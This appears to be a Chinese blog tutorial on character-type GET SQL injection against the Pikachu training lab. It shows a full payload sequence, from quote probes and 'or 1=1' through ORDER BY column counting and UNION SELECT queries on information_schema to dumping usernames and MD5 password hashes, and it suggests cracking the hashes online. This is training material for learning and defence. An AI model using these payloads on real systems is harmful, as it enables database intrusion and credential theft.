NCNIPC--皮卡丘web靶场SQL注入(字符型注入)

已于 2022-03-16 20:20:35 修改
阅读量5.1k 收藏 6
点赞数 2
分类专栏: NCNIPC
于 2022-03-16 20:15:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xulei1132562/article/details/123535039
版权

安全 php

我们打开我们的靶场,我们带着同学简单练习一个字符型注入(get),点击SQL-Inject,点击字符型注入(get),我们直接就测试一下输入1’如图所示。
输入1’测试sql注入
点击“查询”按钮后,回显出报错了,报错信息为“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1”
这个报错信息就是典型的可能存在sql注入的信息,然后我们输入永真式1’or 1=1 #然后点击“查询”按钮,因为永真式恒成立,所以我们得到了全部信息。
在这里插入图片描述
我们输入

1'order by 1#

探测有回显多少个行数,输入

1'order by 1#

发现回显正常,然后输入

1'order by 2#

发现回显正常,如图所示,输入

1'order by 3#

发现回显错误

Unknown column '3' in 'order clause'

那么就说明后端数据库传递过来的数据一共回显两行。
输入1'order by 2#发现回显正常
接下来我们就利用union进行联合查询注入,我们输入

1'union select 1,database()#

然后点击查询,会回显数据库名
在这里插入图片描述
根据回显的信息,我们得到数据库名为pikachu,然后我们可以继续探测一下数据库用户名,输入

1'union select 1,user()#

根据回显root@localhost得到数据库用户名为root。
我们已知数据库名,接下来我们想要拿到数据表名,我们输入

1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')#

如图所示。
在这里插入图片描述
我们已经知道了数据表名,那么我们接下来就是要查询数据表中的列名,比如我们关注users表,那么我们在输入框输入

1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')#

如图所示。
在这里插入图片描述
我们发现了我们比较关注的username与password,所以我们尝试拿到这两个的字段名,我们输入

1'union select (select group_concat(username) from users),(select group_concat(password) from users)#

如图所示。
在这里插入图片描述
拿到了password的密码的md5值(这个靶场是使用md5加密的),然后我们可以使用彩虹表破解,或者使用一些在线破解网站尝试破解,比如cmd5网站等,网址为https://www.cmd5.com,如图所示,我们sql的练习就先介绍到这里,还有很多其他类型的sql注入,大家可以自己尝试去做一下。
在这里插入图片描述

梅苑安全
关注
专栏目录
web-报错注入-皮卡丘靶场
07-15
Web应用中,报错注入通常是由于不安全的SQL查询处理导致的。 在皮卡丘靶场中,我们可以看到几种不同类的报错注入示例: 1. **Insert(POST请求的报错注入)**: 攻击者利用`POST`请求发送Payload `' and ...
国家计算机网络入侵防范中心 钱,国家计算机网络入侵防范中心.PDF
weixin_30794639的博客
06-20 315
国家计算机网络入侵防范中心国家计算机网络入侵防范中心国家计算机网络入侵防范中心安全漏洞收集与发布安全漏洞收集与发布Collection and Announcement ofCollection and Announcement ofSystem Vulnerability of NCNIPCSystem Vulnerability of NCNIPC张玉清张玉清ZHANG YuqingZHANG...
17连环靶场SQL注入—原来你的网站全身都是破绽 (上)
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
05-10 399
Port Swigger SQL注入靶场渗透攻略! 原来你的网站全是破绽!
NCNIPC-靶场介绍&&Django SQL注入(CVE-2021-35042)
03-01 2352
NCNIPC-中国科学院研究生院国家计算机网络入侵防范中心 中心以保护我国网络空间安全为综旨,主要从事黑客防范技术的研究,占领网络安全的技术制高点,作为国家计算机网络与信息安全管理办公室(以下简称国信安办)的依靠力量,承担和协调国内各种黑客事件的防范处理,协助国信安办完成关键部分的应急处理任务,协助解决社会上的应急/救援组织难以解决的网络安全疑难问题,是国家计算机网络应急处理体系中心的重要部门。 中心以保护我国网络空间安全为综旨,主要从事黑客防范技术的研究,占领网络安全的技术制高点,作为国家计算机网络与信息
sql注入详解+docker靶场搭建举例
qq_56438857的博客
05-25 1584
sql详解,原创非复制,送给学弟学妹
iwebsec靶场sql注入
果粒程
02-24 1132
iwebsec靶场sql注入
皮卡丘靶场,初始化就能用
09-24
"皮卡丘靶场"是一个专门用于网络安全教育和训练的平台,它提供了丰富的安全学习资源和实战环境,帮助用户提升安全技能。这个靶场通常包含了各种模拟的安全漏洞环境,让用户在安全的环境中实践攻防技术。从提供的描述...
Python小游戏源码-音符跳跃皮卡丘游戏源码
02-27
《音符跳跃皮卡丘游戏源码》是一个基于Python编程语言开发的小游戏,它将音乐元素与经典角色皮卡丘结合,为玩家提供了一种趣味性和挑战性并存的游戏体验。通过分析游戏源码,我们可以深入理解Python编程在游戏开发...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4198
一次简单的SQL注入靶场练习
WEB常见漏洞之SQL注入靶场篇—1)
One-Fox安全团队的博客
05-05 3956
sqli靶场版SqliLabs 是一个学习 SQL 注入靶场,它提供了 GET 和 POST 的实验场景,涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。
sql注入靶场
weixin_45095113的博客
11-27 463
SQL注入靶场
Web安全 SQL注入靶场搭建(玩转整个注入环境.)
网络安全领域___专研者.
05-25 5881
SQLI-LABS靶场概括: SQL语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。而Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程.
NCNIPC--实验部分参考--Grafana 8.x 插件模块目录穿越漏洞(CVE-2021-43798)
03-17 4970
Grafana 8.x 插件模块目录穿越漏洞(CVE-2021-43798) 实验简介 Grafana是一个开源的度量分析与可视化套件,这个漏洞出现在插件模块中,这个模块支持用户访问插件目录下的文件,但因为没有对文件名进行限制,操作者可以利用…/的方式穿越目录,读取到服务器上的任意文件。此漏洞的利用需要框架中已经下载了插件,没有插件的话无法进行漏洞利用。需要同学提前了解一下burp的基本用法。 实验目的 对CVE-2021-43798有一定的了解 熟练使用burp的重发模块 对linux路径有一定的了解
SQL注入靶场_辛巴猫舍
cxllwh的博客
12-22 847
注:可能有的人喜欢用GROUP_CONCAT 函数,即通过,间隔将多行数据进行整合在一行输出,虽然不用limit去一个一个的查询,但是有的站输出点是由长度限制的,所以会出现输出不完整的情况,在此建议大家习惯利用limit分页查询来输出。输入order by 1和order by 2时页面正常,到order by 3的时候页面显示异常,由此可以得到字段数为2。3.寻找回显点,构造?1.首先我们查一下该数据库有几行,将id=1分别换为2,3,4进行测试,发现到id=4时页面不再显示。漏洞类SQL注入
Pikachu靶场:SQL-Inject之字符注入(get)
witwitwiter的博客
04-21 1830
Pikachu靶场:SQL-Inject之字符注入(get) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击着可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 实验步骤 1.前期工作 先将Proxy中的intercept关闭,使其不进行拦截,让数据通过监听的端口。 2.注入点探测 在字符注入中看到输入框,里面能够输入字符
PIKACHU靶场 ——字符和数字SQL注入练习
PICACHU+++的博客
04-03 897
进入靶场可以看见一个输入框,所以现在里面判断注入点类,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符SQL注入漏洞。
SQL注入——从零开始搭建靶场详细教程_实战练习_注入原理
热门推荐
Ho1aAs‘s Blog
08-02 1万+
文章目录一、环境依赖二、靶场搭建Ⅰ、下载靶场文件Ⅱ、创建网站Ⅲ、更改数据库root密码Ⅳ、新建并导入数据库Ⅴ、验证访问靶场三、实战练习Ⅰ、嗅探字段①、验证合法性※语句解释②、查找注入点③、嗅探字段数Ⅱ、嗅探数据库信息Ⅲ、嗅探数据表信息①、查询所有表②、查询指定表的所有列Ⅳ、爆数据完 一、环境依赖 VMware V15.5(可选) Windows 10 x64 虚拟机(可选) phpstudy V8.1 MySQL V5.7.26(在phpstudy内选择) Nginx 1.15.11(在phpstudy内
pikachu靶场通关之sql注入
最新发布
qq_74825121的博客
01-21 2869
pikachu靶场通关之sql注入
pikachu靶场sql注入
07-27
在Pikachu靶场中,有多种类SQL注入漏洞可以进行测试和学习。这些类包括数字注入字符注入、搜索注入、xx注入、insert/update注入、delete注入、http头注入、盲注(基于布尔值)和盲注(基于时间)以及宽字节注入等。你可以使用工具如sqlmap来进行注入测试,通过构造恶意的SQL语句来获取数据库中的信息。例如,使用sqlmap命令可以指定目标URL和参数,然后进行注入测试,获取数据库中的表信息。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [Pikachu漏洞靶场系列之SQL注入](https://blog.csdn.net/weixin_45868644/article/details/120237977)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [pikachu靶场通关之sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Pikachu(皮卡丘)靶场SQL注入](https://blog.csdn.net/weixin_44268918/article/details/128317939)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅苑安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值